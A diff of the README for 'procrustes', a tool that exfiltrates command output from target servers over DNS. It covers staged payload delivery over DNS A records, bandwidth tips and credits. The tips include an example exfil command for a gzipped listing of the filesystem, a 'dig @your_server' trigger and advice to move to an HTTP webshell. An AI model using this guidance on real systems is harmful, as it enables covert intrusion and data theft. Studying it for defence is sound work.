vp777/procrustes/Readme.md

 [2] On procroustes_chunked, the provided command gets executed multiple times on the server until all of its output is extracted.
 This behavior may cause problems in case that command is not idempotent (functionality or output-wise) or is time/resource intensive.
 A workaround to avoid running into issues for the aforementioned cases is to first store the command output into a file (e.g. /tmp/file) and then read that file.

-[3] The staged version makes use of A records to download the payload.
+[3] In the staged version we have the overhead of the time required to get the actual payload over DNS.
+It should be noted that the script makes use of A records to get the actual payload.
 Even though this allows our traffic to blend in better with the regular traffic of the target environment, it offers limited channel capacity (e.g. 4 bytes per request).
 We could make use of other record types like TXT and minimize the stage download time (close to zero) and the stager size.

 ### Tips

  - You probably want to use this script as little as possible, try to transition to a higher bandwidth channel the soonest possible (e.g. HTTP-webshell)
  - In case long text output is expected, you can try compressing it first to speed up the exfil process, e.g. ./procrustes_full.sh ... -o >(setsid gunzip) -- 'ls -lhR / | gzip'
  - Another possibility for big/binary files is to copy them to a path which is accessible for example through HTTP
- - For increased exfil bandwidth, run the staged_files/dnsns.py on your name server.
+ - For increased exfil bandwidth in procrustes_full, run the dns_server on your name server.
 That way, we avoid waiting for the underlying DNS_TRIGGER to timeout before moving on to a new chunk.
  - Ideally, you would have a domain (-h option) with an NS record pointing to a server you control (server where we run tcpdump).
 Nevertheless, in case the target is allowed to initiate connections to arbitrary DNS servers, this can be avoided by having the DNS trigger explicitly set to use our DNS server (e.g. dig @your_server whatev.er)

 ### Credits
 * [Collabfiltrator](https://github.com/0xC01DF00D/Collabfiltrator) - idea of chunking the data on the server.
 It also performs similar functionalities with this script, so check it out.
-* [DNSlivery](https://github.com/no0be/DNSlivery) - modified version of DNSlivery is used as DNS server in the staged version
+* [DNSlivery](https://github.com/no0be/DNSlivery) - modified version of DNSlivery is used as the DNS server